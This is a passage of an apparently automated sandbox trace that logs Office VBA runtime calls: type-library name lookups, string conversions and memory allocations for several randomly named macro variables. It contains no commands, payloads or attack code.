lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="dACDBZBD") returned 9 [0069.348] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.348] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="dACDBZBD", lHashVal=0x10b555, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.348] IUnknown:Release (This=0x665ba50) returned 0xd [0069.348] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.348] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="dACDBZBD", lHashVal=0x10b555, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.348] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.348] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.348] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="dACDBZBD", lHashVal=0x10b555, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.348] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.348] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.348] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="dACDBZBD", lHashVal=0x10b555, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.348] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8060e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="dACDBZBD") returned 9 [0069.348] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dACDBZBD", lHashVal=0x10b555, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.348] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.348] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8060e | out: _Dst=0x67c2d40) returned 0x0 [0069.348] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_dACDBZBD") returned 0x108cde [0069.349] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_dACDBZBD" | out: _Dst="_B_var_dACDBZBD") returned 0x0 [0069.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_dACDBZBD") returned 16 [0069.349] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.349] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_dACDBZBD", lHashVal=0x108cde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.349] IUnknown:Release (This=0x665ba50) returned 0xd [0069.349] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.349] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_dACDBZBD", lHashVal=0x108cde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.349] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.349] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.349] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_dACDBZBD", lHashVal=0x108cde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.349] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.349] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.349] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_dACDBZBD", lHashVal=0x108cde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.349] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.349] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.349] IUnknown:Release (This=0x665ba50) returned 0xd [0069.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b125ce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_dACDBZBD") returned 16 [0069.349] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dACDBZBD", lHashVal=0x108cde, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x42004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x42004400000000, pDummy=0x0) returned 0x0 [0069.349] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8060e | out: _Dst=0x144ec0) returned 0x0 [0069.349] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.349] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.349] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.349] IUnknown:Release (This=0x665ba50) returned 0xd [0069.349] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.349] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.349] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.350] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.350] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.350] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.350] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.350] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.350] IUnknown:Release (This=0x665ba50) returned 0xd [0069.350] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.350] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.350] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.350] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.350] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.350] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.350] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.350] IUnknown:Release (This=0x665ba50) returned 0xd [0069.350] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.350] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.350] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.350] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.350] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.350] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.351] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.351] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.351] IUnknown:Release (This=0x665ba50) returned 0xd [0069.351] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.351] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.351] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.351] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.351] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.351] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.351] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.351] IUnknown:Release (This=0x665ba50) returned 0xd [0069.351] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.351] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.351] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.351] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.351] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.351] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.351] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.351] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.351] IUnknown:Release (This=0x665ba50) returned 0xd [0069.351] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.352] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.352] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.352] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.352] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.352] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.352] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.352] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.352] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.352] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.352] IUnknown:Release (This=0x665ba50) returned 0xd [0069.352] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.352] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.352] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.352] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.352] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.352] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.352] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.352] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.353] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.353] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.353] IUnknown:Release (This=0x665ba50) returned 0xd [0069.353] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.353] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.353] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8056e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAwwD") returned 7 [0069.353] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oAAwwD", lHashVal=0x100740, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8056e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAwwD") returned 7 [0069.353] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oAAwwD", lHashVal=0x100740, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8056e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAwwD") returned 7 [0069.353] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oAAwwD", lHashVal=0x100740, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.353] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oAAwwD") returned 0x100740 [0069.353] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="oAAwwD" | out: _Dst="oAAwwD") returned 0x0 [0069.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="oAAwwD") returned 7 [0069.353] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.353] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oAAwwD", lHashVal=0x100740, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.353] IUnknown:Release (This=0x665ba50) returned 0xd [0069.353] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.353] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oAAwwD", lHashVal=0x100740, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.353] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.354] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.354] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oAAwwD", lHashVal=0x100740, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.354] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.354] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.354] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oAAwwD", lHashVal=0x100740, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.354] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8056e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAwwD") returned 7 [0069.354] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oAAwwD", lHashVal=0x100740, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.354] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.354] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8056e | out: _Dst=0x67c2d40) returned 0x0 [0069.354] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oAAwwD") returned 0x1081e9 [0069.354] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_oAAwwD" | out: _Dst="_B_var_oAAwwD") returned 0x0 [0069.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_oAAwwD") returned 14 [0069.354] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.354] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oAAwwD", lHashVal=0x1081e9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.354] IUnknown:Release (This=0x665ba50) returned 0xd [0069.354] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.354] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oAAwwD", lHashVal=0x1081e9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.354] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.354] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.354] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oAAwwD", lHashVal=0x1081e9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.354] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.354] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.354] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oAAwwD", lHashVal=0x1081e9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.354] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.354] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.355] IUnknown:Release (This=0x665ba50) returned 0xd [0069.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b125fe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_oAAwwD") returned 14 [0069.355] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oAAwwD", lHashVal=0x1081e9, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x77007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x77007700000000, pDummy=0x0) returned 0x0 [0069.355] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8056e | out: _Dst=0x144ec0) returned 0x0 [0069.355] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uAo1wABA", lHashVal=0x10c961, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80662, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uAo1wABA") returned 9 [0069.355] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uAo1wABA", lHashVal=0x10c961, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, 